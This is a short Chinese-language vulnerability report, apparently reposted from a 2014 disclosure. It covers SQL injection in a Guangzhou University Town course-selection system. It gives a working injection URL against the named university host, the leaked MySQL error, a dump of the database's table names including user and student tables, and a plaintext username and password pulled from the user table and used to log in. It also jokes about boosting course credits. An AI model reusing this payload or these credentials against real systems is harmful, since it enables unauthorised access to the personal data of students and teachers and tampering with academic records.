Home >Database >Mysql Tutorial >广州大学城高校互选课程管理系统sql注入致大量教师学生用户信息_MySQL

广州大学城高校互选课程管理系统sql注入致大量教师学生用户信息_MySQL

WBOY
WBOYOriginal
2016-06-01 13:14:181357browse

广州大学城高校互选课程管理系统sql注入致大量教师学生用户信息泄漏某处过滤不当导致的sql注入,学分刷起来!

访问:
http://unitown.scnu.edu.cn/ShowMTeachPlanList.php?SelectType=coll&Depart_coll=%B9%E3%B6%AB%CD%E2%D3%EF%CD%E2%C3%B3%B4%F3%D1%A7%%27
错误信息:

<code>mySQL 查询错误: SELECT Zhy.DepartID, Zhy.Zhy_Code, Department.Depart_coll, Department.Depart_majorFROM Zhy , Department WHERE Zhy.DepartID = Department.DepartIDAND Department.Depart_coll ='广东外语外贸大学%''<br><br>mySQL 发生错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''广东外语外贸大学%''' at line 1<br>mySQL 错误代码: 1064<br>时间: Sunday 30th 2014f March 2014 11:34:48 AM</code>
<code>[18 tables]<br>+---------------------------------------+<br>| News|<br>| user|<br>| course|<br>| course_recepter |<br>| course_resourse |<br>| coursevaild |<br>| department|<br>| error |<br>| excellentcourse |<br>| majorcode |<br>| mcteachplan |<br>| mcteachplanarrangement|<br>| noteinfo|<br>| receive |<br>| selcourse |<br>| studentinfo |<br>| systemrecord|<br>| zhy |<br>+---------------------------------------+</code>


首页就有登陆入口,整一条user记录,登陆一下
lihh pwd:lihh

 

Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn